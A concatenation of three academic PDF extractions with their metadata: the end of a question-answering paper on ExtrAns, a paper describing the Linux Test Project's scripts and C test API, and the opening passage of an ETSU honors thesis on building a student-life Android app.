kind of language processing. More successful approaches employ special treatment for some terms (e.g, named entity recognition [7, 3]) or a taxonomy of questions [22, 1, 6, 10]. The standard methods used in IR to rank hits according to their relevance are no substitute for these techniques. Relevance in IR is almost invariably determined on the basis of the weights assigned to individual terms, and these weights are computed from term frequencies in the documents (or passages) and in the entire document collection (the tf/idf). Since this measure is blind to syntactic (and hence semantic) relationships it does not distinguish between hits that are logically correct and others. It is interesting to observe how some of the systems that obtained good results in the QA track of TREC have gradually moved away from bag-of-words approaches and into NLP techniques, using semantic information. For instance, Falcon [8] (the best performing system in TREC 9) performs a complete analysis of a set of selected texts for each query and of the query itself and creates, after several intermediate steps, a logical representation inspired by the notation proposed by Hobbs (on which we also base our MLFs). The syntax analysis in Falcon is based on a statistical parser [4] while we use a dependency parser that computes all syntactically possible structures which we then filter according to a combination of hand-crafted rules and Brill and Resnik disambiguation procedure [2]. A similarity between ExtrAns and Falcon is that both build a semantic form starting from a dependency-based representation of the questions. As for the type of inferencing used, while ExtrAns uses standard deduction (proving questions over documents), Falcon uses an abductive backchaining mechanism, which can be used to provide a “logical proof” as a justification for the answer. Further it has an interesting module (which so far we do not have) capable of caching answers and detecting question similarity. In an environment where the same question (in different formulations) is likely to be repeated a number of times such a module can significantly improve the (perceived) performance of a QA system. 8 Conclusion The QA track of TREC has proved that Natural Language Processing techniques cannot be dispensed of if relevant answers have to be pointed out precisely. The meaning of both queries and documents must be taken into account, by syntactic and semantic analysis. Our fully functioning AE system, ExtrAns, shows that such applications are within the reach of present-day technology. REFERENCES
{"Source-Url": "http://www.zora.uzh.ch/id/eprint/19093/1/Rinaldi_Dowdall_Hess_2002.pdf", "len_cl100k_base": 5495, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 19336, "total-output-tokens": 7188, "length": "2e12", "weborganizer": {"__label__adult": 0.0005083084106445312, "__label__art_design": 0.0009636878967285156, "__label__crime_law": 0.0010347366333007812, "__label__education_jobs": 0.00806427001953125, "__label__entertainment": 0.000545501708984375, "__label__fashion_beauty": 0.00036835670471191406, "__label__finance_business": 0.0006732940673828125, "__label__food_dining": 0.0005669593811035156, "__label__games": 0.0014705657958984375, "__label__hardware": 0.00102996826171875, "__label__health": 0.0010786056518554688, "__label__history": 0.0007138252258300781, "__label__home_hobbies": 0.00015652179718017578, "__label__industrial": 0.0006284713745117188, "__label__literature": 0.00640106201171875, "__label__politics": 0.0006742477416992188, "__label__religion": 0.0007696151733398438, "__label__science_tech": 0.416015625, "__label__social_life": 0.00036025047302246094, "__label__software": 0.0980224609375, "__label__software_dev": 0.45849609375, "__label__sports_fitness": 0.0003409385681152344, "__label__transportation": 0.0007834434509277344, "__label__travel": 0.00030303001403808594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29792, 0.02057]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29792, 0.54885]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29792, 0.90282]], "google_gemma-3-12b-it_contains_pii": [[0, 892, false], [892, 6370, null], [6370, 11010, null], [11010, 18523, null], [18523, 22314, null], [22314, 29792, null]], "google_gemma-3-12b-it_is_public_document": [[0, 892, true], [892, 6370, null], [6370, 11010, null], [11010, 18523, null], [18523, 22314, null], [22314, 29792, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29792, null]], "pdf_page_numbers": [[0, 892, 1], [892, 6370, 2], [6370, 11010, 3], [11010, 18523, 4], [18523, 22314, 5], [22314, 29792, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29792, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
e287d9606939bcb7466b5323889cf2416f64a152
Testing Linux with the Linux Test Project Paul Larson Linux Technology Center IBM plars@us.ibm.com Abstract The Linux Test Project is an organization aimed at improving the Linux kernel by bringing test automation to the kernel testing effort. To meet this objective, the Linux Test Project develops test suites that run on multiple platforms for validating the reliability, robustness, and stability of the Linux kernel. The LTP test suite was designed to be easy to use, portable, and flexible enough that tests could be added without requiring the developer to use functions provided by the LTP test driver. This talk will cover what the Linux Test Project is and what we are doing to help improve Linux. I also plan to talk about the features provided by the test harness, the structure of the test cases, and how test cases can be written to contribute to the Linux Test Project. 1 Introduction Through the years of Linux development, many people have asked the question, "What is being done to test Linux?" Historically, Linux testing efforts have been primarily informal and ad-hoc in nature. Users of Linux simply use it for their own normal purposes and report any problems they find. LTP has been done to bring any organized testing effort to Linux though. This matter improved somewhat in May of 2000 when Silicon Graphics Inc. TM introduced the first version of the Linux Test Project (LTP). Since that time, many individuals in the open source community and even companies such as IBM @, OSDL TM, and BULL ® have contributed to the LTP. 2 Using LTP One of the design goals of the Linux Test Project was to make it easy to use. To facilitate this, the LTP includes three scripts for executing subsets of the automated tests. They are: - runalltests.sh - runs all the automated kernel tests in sequential order - network.sh - runs all the automated network tests in sequential order - diskio.sh - runs the stress_floppy and stress_cdrom The runalltests.sh can be executed with little or manual setup required by the user. Even though the script is named "runalltests" it does not really run every test in the LTP. It runs all of the completely automated tests that do not require the user to perform manual setup tasks. Destructive tests and tests that consume so many system resources that they are designed to be run independently, such as a few of the memory tests, are not included in runalltests. The network.sh script is a group of most the network tests. These are grouped separately because additional setup is required for these tests to function correctly. Two test machines are necessary to run all of the network tests. Both machines should have the same version of LTP compiled and installed in the same location. The client machine will be the one where the network.sh script is actually executed. On the server machine, a.rhosts entry should be created for the root user to allow connections from the client machine. The following services will need to be running for successful execution of the network test suite: rlogind, ftpd, telnetd, echo (stream), fingerd, and rshd. More detailed information about the setup for the machines running LTP may be found in the document called "How To Run the Linux Test Project (LTP) Test Suite" [RunLTP]. The diskio.sh script is a small test set that runs two io intensive tests. One of these targets the cdrom drive and the other targets the floppy drive. For the cdrom test to run, a cdrom with data on it must be inserted in the cdrom drive. For the floppy stress test to run, a blank, formatted floppy disk must be in the floppy drive. The test driver itself is called pan. Pan can be passed a file that lists the tests to be executed, execute them, and exit with 0 if all tests passed, or with a number indicating how many tests failed. The line from runalltests.sh that executes pan looks like this: \[ \$\{(LTPROOT)/pan/pan -e -S -a $\$ -n $\$ -f \$(TMP)/alltests \] The -e is necessary to tell pan to exit with the number of tests that failed. By default it will ignore exit statuses, but it is generally useful to have pan run this way. The -D option tells pan to run tests sequentially as they are read from the command-file. If this option is not specified, it will select tests at random to run. The -a $\$ in the command line tells pan the name of a file to use to store the active test names, pids, and commands being executed. The $\$ is used here to have it use the current pid so that a unique file is used to store this information. The -n $\$ in the command line is a tagname by which this pan process will be known. It is required and should be unique so $\$ is convenient to use again. The -f option is used to tell pan the name of a command-file to execute tests from. The command-file is a text file containing one test per line. The first item on the line is the tag name of the test, by which pan will know it. Usually this should match the TCID of the test. After the tag name and a space should be the executable with any necessary arguments. These files are usually stored under the runtest directory of LTP, but in the case of runalltests, several have been concatenated together into a file called alltests. Another useful option for pan that is not used in runalltests is -s. The -s option tell pan the number of tests to run before exiting. If 0 is used here, pan will keep executing tests until it is manually stopped. The -t option can be used to specify the amount of time pan should run tests. This time can be specified in seconds, minutes, hours, or days. For instance, -t 12h would tell pan to stop executing tests after 12 hours. A complete list of options for pan can be found in the man page for pan in the /doc/manual /citeLTP-Man directory under LTP. Tests may also be executed individually without the need for running them under pan or from a script. Once compiled, the tests are linked under the /testcases/bin directory from the top of the LTP source tree. Testcases may be executed directly from here with any valid command line options. This is very useful when a particular test is observed to cause an error. The test can be executed alone to reproduce the error rather than waiting for the entire test suite to run. Sometimes it is desirable to modify tests slightly for debugging purposes, or to add additional testing to them. To help make it easier to find tests, they have been organized under the testcases directory into four main categories: - **Kernel** - Kernel related tests such as filesystems, lo, ipc, memory management, scheduler, and system calls. - **Network** - Network tests including tests for ipv6, multicast, nfs, rpc, setp, and network related user commands - **Commands** - Tests for user level commands like those commonly used in application development such as ar, ld, ldd, nm, objdump, and size. - **Misc** - Miscellaneous tests that do not fit into one of the other categories. Tests such as crash (an adaptation of the well-known crashme test), f00f, and a floating point math set of tests can be found in the misc directory. Other tests that are not part of the automated test scripts previously mentioned may also be found under this directory tree. For these tests that are not automated, the only way to run them at the time being is manually. 3 Developing Tests for LTP The Linux Test Project was designed to be flexible enough to allow test cases to be added to it without requiring the use of any cumbersome test driver specific features. The LTP does provide a small set of functions that can be used to help with the consistency of test cases and to act as a convenience for the developer, but the driver does not require their use. Tests written to be executed under the LTP should be self-contained so that it can be executed under any environment, or separately. They should be able to detect within the test itself whether or not the test passed. If the test passes, it should return 0 or anything else if the test fails. The exact nature of return codes other than 0 may be different from one test to another. Most of the tests in LTP have been written in C, but they may be written in perl, shell scripting languages, or anything else as long as appropriate return values are preserved. This flexibility allows developers to take any quick test they have written to test something, make sure it returns 0 if it passes or anything else if it doesn’t, and submit it for inclusion in the LTP. Some of the functions in LTP make use of global variables that define various aspects of the test case. Even if it is unknown whether or not these functions will be used, it is a good idea to define these variables in order to be consistent with other test cases in the LTP. ```c char *TCID="test01"; ``` The TCID variable should be defined in a way similar to the example above. The convention that has been used in other test cases in the LTP is the system call name, or some other name representing the test followed by a two digit number. The TCID should be different from any other LTP test case or results may be confusing when executing all the tests in the test suite. It is also a good idea to make the TCID be the same as the name of the source code file for the test. In this example, the file name should be something like test01.c. The global variable TST TOTAL is of type int and should be used to specify the number of individual test cases within the test program. Each test should be associated with an output line declaring the outcome of the test case. ```c extern int Tst_count; ``` The Tst_count variable is used as a test case counter in the main test loop. The output functions provided by LTP use this variable to get the number of the test case currently being executed. This should be automatically incremented each pass through the test loop. ```c for (lc=0; TEST_LOOPING(lc); lc++) { ... } ``` The main test loop is just a for loop, but it implements a macro called TEST LOOPING to control the number of iterations through the loop. Standard command line options for LTP test cases allow the user to set a certain number of iterations or an amount of time to run each test. TEST LOOPING handles making sure that the test is executed for the correct number of iterations, or for the correct amount of time. The actual test itself should be wrapped in the TEST() macro. The TEST() macro starts by resetting errno to 0 to ensure that the correct errno is detected after the test is complete. After executing the system call passed to it, TEST() sets two global variables. TEST_RETURN is set to the return code and TEST_ERRNO is set to the value of errno upon return. There is also a variation of the TEST() macro called TEST VOID() that should be used for testing system calls that return void. Tests that require little or no manual setup are preferred. Usually setup can be performed within the test itself, or with command line options that can be passed from the execution script. If manual setup is required, the test may be left out of automated execution scripts, or grouped with other tests that have similar setup requirements such as the network tests. Many tests require a temporary directory to store files and directories created during the test. This is especially true of filesystem tests, and tests of system calls that operate on files and directories. The tmpdir() and rmdir() functions provide a convenient method of creating and cleaning up a temporary area for the test to use. The `tst_tmpdir()` function creates a unique, temporary directory based on the first three characters of the TCID global variable. Once the directory is created, it makes it the current working directory and returns to continue execution of the test. The name of the directory created will be saved in an extern char* variable called TESTDIR in case it is needed by the test case, and for later removal by the `tst_rmdir()` function. If it is unable to create a unique name, unable to create the directory, or unable to change directory to the new location `tst_tmpdir()` will use `tst_brk()` to output a BROK message for all test cases in the test and exit via the `tst_exit()` function. Since no cleanup function will be automatically performed in this situation, `tst_tmpdir()` should only be used at the beginning of the test before any resources have been created that would require a cleanup function. The `tst_rmdir()` function will remove the temporary directory created by a call to `tst_tmpdir()` along with any other files or directories created under the temporary directory. The `system()` function is used by `tst_rmdir()` so the test case should not perform unexpected signal handling on the SIGCHLD signal. One of the biggest conveniences provided by using the LTP API is `parse_opts()`. The `parse_opts()` function provides a consistent set of useful command line options for test cases, and allows the developer to easily add more options. ```c #include "test.h" #include "usctest.h" char *parse_opts(int argc, char *argv[], option_t option_array[], void (*user_help_func)()); typedef struct { char *option; int *flag; char **arg; } option_t; ``` `Option_array` must be created by the developer to contain the desired options in addition to the default ones. `user_help_func()` is a pointer to a function that will be called when the user passes `-h` to the test case. This function should display usage information for the additional options added only. If you do not wish to specify any addition command line options, `parse_opts()` should be called with NULL for `option_array` and `user_help_func()`. The default options provided by `parse_opts` are: - `-c n` - Fork n copies of this test and run them in parallel. If `-i` or `-l` are also specified, each forked copy will run for the given number of iterations or amount of time respectively. - `-e` - Log all errors received during the test. - `-f` - Suppress messages about functional testing - `-h` - Print the help message listing these default options first, then call `user_help_func()` to display help for any extra options the developer may have added. - `-i n` - Run the test for n consecutive iterations. Specifying a 0 for n will cause the test to loop continuously. - `-I x` - Run the test loop until x seconds have passed. - `-p` - Wait to receive a SIGUSR1 before beginning the test. `TEST_PAUSE` must be used in the test at the point you want it to wait for SIGUSR1. - `-P x` - Delay x seconds after each iteration before starting the next one. Another useful feature of the LTP API is that it provides functions to output results and output test status in a consistent manner, and exit the test with an exit code consistent with the results from that output. This paper will not cover all of the functions to do this but will only briefly discuss the most common ones. All of these functions need to be passed a `tttype` that specifies the type of message that is being sent. The available values for `tttype` are: - `TPASS` - Indicates that the test case had the expected result and passed - `TFAIL` - Indicates that the test case had an unexpected result and failed - `TBROK` - Indicates that the remaining test cases are broken and will not execute correctly because some precondition was not met such as a resource not being available. • TCONF - Indicates that the test case was not written to run on the current hardware or software configuration such as machine type, or kernel version. • TRET - Indicates that the test case has been retired and should not be executed any longer. • TERROR - Indicates that the test case experienced an unexpected or undesirable event that should not affect the test itself such as being unable to clean up resources after the test finished. • TINFO - Specifies useful information about the status of the test that does not affect the result and does not indicate a problem. The first result output function is \texttt{tst_resm}(). \begin{verbatim} void tst_resm(int ttype, char *tmesg, [arg ...]) \end{verbatim} This function will output \texttt{tmesg} to STDOUT. The \texttt{tmesg} string and associated args can be given to \texttt{tst_resm()} and the other functions listed here in the same fashion as strings with args can be passed to \texttt{printf}(). After outputting the message, the test case will resume. \begin{verbatim} void tst_brkm(int ttype, void (*func)(), char *tmesg, [arg ...]) \end{verbatim} The \texttt{tst_brkm()} function prints the message specified by \texttt{tmesg}, calls the function pointed to by \texttt{func}, and exits the test breaking any remaining test cases. \begin{verbatim} void tst_exit() \end{verbatim} The \texttt{tst_exit()} function exits the test with status depending on \texttt{ttypes} passed to previous calls to functions such as \texttt{tst_brkm()} and \texttt{tst_resm}(). For TPASS, TRET, TINFO, and TCONF the exit status is unaffected and will be 0 indicating that the test pass. TFALL, TBROK, and TWARN all indicate that something went wrong during the test, or that the test failed and will cause \texttt{tst_exit()} to exit the test with a non-zero status. When a test cases receives an unexpected signal, it is useful to provide a means of making it exit gracefully. The LTP provides a convenient way of doing this through the \texttt{tst_sig()} function. #include "test.h" void tst_sig(fork_flag, handler, cleanup) char *fork_flag; int (*_handler)(); void (*cleanup)(); If the test case is creating child processes through functions such as \texttt{fork()} or \texttt{system()}, then \texttt{tst_sig} needs to know to ignore SIGCHILD. This can be accomplished by setting \texttt{fork_flag} to FORK. If the test case is not creating child processes, \texttt{fork_flag} should be set to NOFORK. Keep in mind that if the test uses \texttt{tst_tmpdir()} and \texttt{tst_remove()}, the \texttt{fork_flag} should be set to FORK because \texttt{tst_remove()} uses the \texttt{system()} library call. The handler parameter of \texttt{tst_sig()} represents the function that will be called when an unexpected signal is intercepted. The developer may provide a custom signal handler function here that returns int, or the default signal handler may be used. To use the default signal handler for \texttt{tst_sig()}, pass \texttt{DEF_HANDLER} as the \texttt{handler} parameter to \texttt{tst_sig()}. If the default handler is used, then the TCID and Tst_count variables must be defined. The default handler will use \texttt{tst_resm()} to output messages for all remaining tests that were incomplete when the signal was received. The cleanup parameter is used to specify a cleanup function. After the handler has been executed, \texttt{tst_sig()} will execute the cleanup function. The cleanup function should take care of removing any resource used by the test such as files or directories that were created to facilitate testing. If nothing is required for cleanup, \texttt{NULL} can be passed to \texttt{tst_sig()} in place of a cleanup function. 4 The Future of LTP Most of the future plans for the Linux Test Project focus on expanding test coverage. The majority of test cases in the LTP today test system calls. This is, of course, a very important part of testing Linux, but not the only thing that should be addressed. Some tests have already been added for things such as networking, memory management, scheduling, commands, floating point math, and databases but the breadth of test coverage should continue to expand. As the variety of tests increases, it may one day become necessary to modularize the LTP tests into separate suites that can be executed and even downloaded separately. The LTP was reorganized to make this easier if and when it becomes desirable to do so. The completeness of current test cases should also be analyzed and improved upon if necessary. We are currently looking at code coverage analysis tools to determine how much of the target kernel code is being executed by test cases in the LTP. As we find areas of kernel code that are not adequately covered by test cases in the LTP, test cases are written or modified to expand coverage to these areas. Additional tests are of course critical to the test suite, but for the Linux Test Project to truly be effective, people must use it. It would be nice to see the LTP test suite run as part of the exit criteria for releasing new kernels in the stable and development trees. In addition to this, it would be useful for kernel developers to execute the test suite against patches before submitting them. The LTP test suite will not find all problems but it could reduce the number of errors in new code if used properly. If kernel developers and testers diligently submit tests for defects as they are found, the test suite could even help reduce the number of regressed defects found in Linux. References [LTPMan] The Linux Test Project Man Pages Linux Test Project. [Howto] Nate Straz, Linux Test Project HOWTO Linux Test Project. [RunLTP] Casey Abell and Robbie Williamson, How To Run the Linux Test Project (LTP) Test Suite Linux Test Project.
{"Source-Url": "http://ltp.sourceforge.net/documentation/technical_papers/ltp.pdf", "len_cl100k_base": 4730, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 39858, "total-output-tokens": 5137, "length": "2e12", "weborganizer": {"__label__adult": 0.00023305416107177737, "__label__art_design": 0.0001996755599975586, "__label__crime_law": 0.00021135807037353516, "__label__education_jobs": 0.0006012916564941406, "__label__entertainment": 5.334615707397461e-05, "__label__fashion_beauty": 9.262561798095704e-05, "__label__finance_business": 0.00013267993927001953, "__label__food_dining": 0.0002636909484863281, "__label__games": 0.0005216598510742188, "__label__hardware": 0.0013742446899414062, "__label__health": 0.00024628639221191406, "__label__history": 0.0001183152198791504, "__label__home_hobbies": 6.365776062011719e-05, "__label__industrial": 0.00023794174194335935, "__label__literature": 0.00012385845184326172, "__label__politics": 0.0001519918441772461, "__label__religion": 0.0002524852752685547, "__label__science_tech": 0.017303466796875, "__label__social_life": 7.230043411254883e-05, "__label__software": 0.01551055908203125, "__label__software_dev": 0.96142578125, "__label__sports_fitness": 0.0002009868621826172, "__label__transportation": 0.0003027915954589844, "__label__travel": 0.0001289844512939453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21375, 0.00508]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21375, 0.48733]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21375, 0.89694]], "google_gemma-3-12b-it_contains_pii": [[0, 3145, false], [3145, 7256, null], [7256, 11433, null], [11433, 15389, null], [15389, 19630, null], [19630, 21375, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3145, true], [3145, 7256, null], [7256, 11433, null], [11433, 15389, null], [15389, 19630, null], [19630, 21375, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 21375, null]], "pdf_page_numbers": [[0, 3145, 1], [3145, 7256, 2], [7256, 11433, 3], [11433, 15389, 4], [15389, 19630, 5], [19630, 21375, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21375, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
55be094b7e63bf10ebe4992c4ca0e779a77d0249
Development of ETSU Student Life Android Application Tyler L. Cox ETSU Follow this and additional works at: http://dc.etsu.edu/honors Part of the Other Computer Sciences Commons, and the Software Engineering Commons Recommended Citation http://dc.etsu.edu/honors/231 This Honors Thesis - Open Access is brought to you for free and open access by Digital Commons @ East Tennessee State University. It has been accepted for inclusion in Undergraduate Honors Theses by an authorized administrator of Digital Commons @ East Tennessee State University. For more information, please contact dcadmin@etsu.edu. DEVELOPMENT OF ETSU STUDENT LIFE ANDROID APPLICATION Thesis submitted in partial fulfillment of Honors By Tyler Cox The Honors College University Honors Scholars East Tennessee State University May 10, 2014 Tyler Cox, Author Don Bailes, Faculty Mentor Mike Lehrfeld, Faculty Reader Laughton Messmer, Faculty Reader **Contents** Introduction.................................................................................................................... 1 Background....................................................................................................................... 1 Learning & Initial Development...................................................................................... 2 Roadblocks and Moving Forward.................................................................................. 3 Analysis of Official ETSU Application........................................................................ 4 Differences and Overlap .............................................................................................. 6 Starting Again from Scratch ...................................................................................... 7 “Home” Screen ............................................................................................................ 8 “Entertainment” Screen .............................................................................................. 9 “Directions” Section .................................................................................................. 12 “Food” Section .......................................................................................................... 15 Reflection .................................................................................................................. 15 Works Cited .............................................................................................................. 17 **Introduction** In the ever-changing field of computing technology, staying up to date with the cutting edge is the key to success. Most companies, businesses, and even academic institutions attempt to take part in this technological arms race to stay modern with current technology. East Tennessee State University was no exception this rule. With around 56% of Americans currently owning a smartphone (that being a phone that has access to the internet) (Smith 2013), mobile development is obviously one of these edges that places are scrambling to get a presence. **Background** In the fall of 2011, ETSU currently had no mobile presence for itself aside from a few mobile versions of frequently used websites (Such as their main homepage). At this point, ETSU began approaching the Department of Computing (at that time, the Department of Computer Science) about possibly working with them to create a mobile application that represents the school that would allow students to import pages and information quickly and easily. It was at this time that I was speaking with professors about possible thesis research. I came to Dr. Don Bailes with this question and he mentioned to me that ETSU was looking for someone to develop an Android application for the school. Prior to this, I had no experience whatsoever with development on a mobile platform, but as this was a cutting edge field, I was naturally attracted to the idea. Dr. Bailes spoke with me about what exactly the project entailed and what ETSU wanted from this application. I immediately jumped on-board with the idea began teaching myself the ins and outs of Android Programming. I was in Dr. Bailes’s Honors Intro to Computer Science II class at this point and spoke with him about allowing me to make the initial work on this project count as a final project, to which he was happy to accept. **Learning & Initial Development** I began by searching Google for Android Programming tutorials. This led me to Google’s incredibly helpful and detailed guide for Android development in Eclipse (The IDE, or development environment, that I had the most experience with at the time). Armed with this information, I started development of a first program. That first program took quite a bit of time, but it helped improve my understanding on how Android worked. I was already familiar with the Java programming language (What Android is written in) as a result of the Introduction to Computer Science courses that I had completed. The experience was not very helpful for Android development, as these courses focus on PC development, while most of the use of Java in Android development is the generation of web pages and items on these pages. Also, the pages generated with Android have an XML foundation. At this point, the only webpage generating code that I knew was HTML. XML was another completely new concept to me that I was very intimidated by at first. I assumed it would be similar to HTML, but when I opened up the XML for my first page, the syntax was much different. Fortunately, with the Android System Development Kit in Eclipse, it produces a what-you-see-is-what-you-get (WYSIWYG) editor that allows the programmer to drag-and-drop various text fields, buttons, and other components onto a screen that will become your webpage. This allowed me to generate basic pages without having to know all of the nuances of Java and XML. Figure 1 shows the basic editing screen in Eclipse for an Android Application. Figure 1. Eclipse’s interface for editing a particular Android page For this first experience with Android, I went through a few of the basic tutorials that Google provided for novice developers and came up with an interactive framework that would hold my future application. At this point, the design of my mobile application was incomplete. This led to the first iteration of the application simply being a collection of screens and links. The main bulk of the work for my “Final Project” that this ended up being was the process of learning a completely new platform of development and applying that into a basic application. Roadblocks and Moving Forward After this initial effort, the project seemed to be headed in an excellent direction. Unfortunately, around this time the development started to falter and issues began to arise. Due to a series of intense class schedules and a steady stream of out-of-class work, development of the application slowed to a crawl and eventually had to stop. These more pressing projects, assignments, and deliverables took precedence over development and it somewhat fell to the wayside. During this downtime in development, ETSU still wanted to have their application created. I had never actually been in direct contact with any administrative unit from ETSU about my thesis becoming the “official” student application for the college, and this proved to be a major thorn in my side. During this downtime ETSU contracted an outside developer to continue the creation of the ETSU Student Application. This came as a bit of a shock to me, but in retrospect I should have anticipated it. A crucial error I made during this development process was the lack of direct communication with those at ETSU that wanted an application regarding my project. They had a need for a mobile presence and wanted it more quickly than I could deliver it. I should have contacted ETSU administration as soon as I agreed with Dr. Bailes to work on the project. Because of this lack of discussion, ETSU went and hired another developer/group of developers to create what they needed sooner. This third-party developer followed the specifications that ETSU wanted in its application and produced a quality product. **Analysis of Official ETSU Application** The official ETSU mobile application has a series of functions: It allows student access to D2L, Athletics, Social Media, News, Course Information, Maps, and ETSU-made videos. Figure 2 provides a screen capture of what the ETSU-made application looks like. Due to this app already being made, I was forced to make a decision: should I continue with my goal of creating a student life application, or scrap the idea and start with something new. This was a difficult decision, as I was initially drawn to the student life application project by a desire to create something that would be beneficial to the student population as a whole and could even be picked up as an official product of ETSU. In the end, the desire to create an application for ETSU students to assist with their daily lives led me to the decision to continue the course that I was on and develop an unofficial mobile application to complement the existing ETSU application. I focused on finding different core functionalities for my student life application and the official ETSU mobile application. While I wanted my project to be complementary, I concluded that some overlap between the two would still be acceptable. Implementing overlapping features would allow me to learn how to develop those features. **Differences and Overlap** This led to a period of brainstorming of what unique features my application would have, as well as what features would overlap with the current application. I asked many of the newer students to ETSU that I knew as well as those that had been at ETSU longer as to what kind of features they would find useful in such an application. The easiest sections to come up with were those that I felt like were important enough to overlap between the two. When I think of what the average college student would be wondering about when it came to their school, there are a few things that spring to mind. Some of these are aspects such as dining, directions, sports, and events. From Figure 2 above, the official ETSU application provides the user with access to sports as well as campus events. I elected to have these key elements in my application due to the fact that even if a student only downloaded my application and not ETSU’s official one, they would still be up to date with a good amount of the activities happening on campus. The actual implementation of my versions of these features will be addressed later by going into detail into just how they work and what exactly they provide the user. For differing aspects of the applications, I chose to include two key different features: directions and dining. ETSU’s official application has maps functionality, but it is not to the point that I feel like a student could effectively use it. While simply seeing a map of campus may be useful for finding one’s way around, I felt that a few user experience changes could make that even better. For starters, if students new to campus were lost trying to find their way around to a particular class, a map isn’t too terribly helpful. For example, if a student has no clue where exactly they are on campus without signs around to determine the building names. What would just having a map do? I felt like this could be remedied by implementing a series of walking/driving directions that they user could be given to direct them exactly where they need to go from any location to arrive at their destination. This would provide students with a simple, yet effective method to get to wherever they need. Also, a much forgotten choice that students have access to is ETSU ID Bucs. While most students stick to a meal plan for their food options, some (me included) have ID Bucs loaded on to their ETSU ID and use it in various locations. An unfortunate downside to this, though, is that very few people know where exactly these ID Bucs can be used at. Obviously the first thing that most people think of is on-campus food places, but unbeknownst to most of the student body, there are a plethora of off-campus restaurants and establishments that will accept ID Bucs. I felt like having a place in the application that provides this information for the user as well as simply showing what all dining options are available close to the college would be an excellent boon for the user. Starting Again from Scratch Another roadblock came in the way at this point in development, unfortunately. During my extended hiatus from working on the project, one way or another, all of my files from my first prototype of the project had become corrupted and rendered unusable. This was more of a moral setback than anything, as I had to start from scratch with development. A heavy workload the past semesters had come in between me first getting familiar with Android and this point in time, so I was hoping to have this previous code as a starting point to re-familiarize myself with. As this was not the case anymore, I essentially started learning Android all over again from scratch. The plus-side of this was that having much more web development experience from classes such as Server-Side Programming and Advanced Web Development, I was able to grasp the concepts behind what was creating the pages and the interactions between them as opposed to relying so heavily on the WYSIWYG editor. This lead to me being much more comfortable with the Android development and allowed me to start from an area that would be more stable going forward. All of this led to the “round 2” of development beginning around the start of my senior year. I began the development similarly to what I did when I initially started to learn Android: I followed some tutorials that Google helpfully provided until I grasped the basics. I picked up much faster this time and was able to quickly get a framework set up of what the project would be in. I wanted the application to be split into three different categories: Food, Directions, and Entertainment. “Home” Screen The application would initially boot up into a home screen that allowed the user to navigate to a particular page depending on which of these three categories they were interested in. Figure 3 shows what this home screen looks like at the current iteration of the application. Figure 3. The home screen of ETSU Student Life. Provides the user with access to Food, Directions, and Entertainment. This gives the user an easy-on-the-eyes starting position with easily recognizable paths to choose from to decide what they want to do. The user will see these three options and immediately be able to know to navigate to one of them to continue on to their desired destination. “Entertainment” Screen After creating this initial home screen, I decided that the first functionality to tackle would be the “Entertainment” section. Under this section, the user would be able to find “stuff to do” around campus. ETSU unfortunately has a poor reputation for on-campus events, but this is not true at all. There are plenty of events going on at ETSU, but the students are just rarely aware of them. This section will allow students to find out these campus events, schedules for ETSU’s various sports teams, as well as have access to ETSU’s student-run newspaper, The East Tennessean. Figure 4 shows the current version of the “Entertainment” page. ![Figure 4. This shows the “Entertainment” screen in my application.](image) From this screen, the user can navigate to the three aforementioned places. The “Campus Events” button will take the user to ETSU’s calendar of events happening on campus from the current date of access up to the next two weeks. This way any student who uses this application can easily be up-to-date on whatever is happening around campus. The “East Tennessean” button will link the user to the homepage of the East Tennessean’s website. This website is updated every time a new issue is put out, so this will allow for a student to keep up-to-date 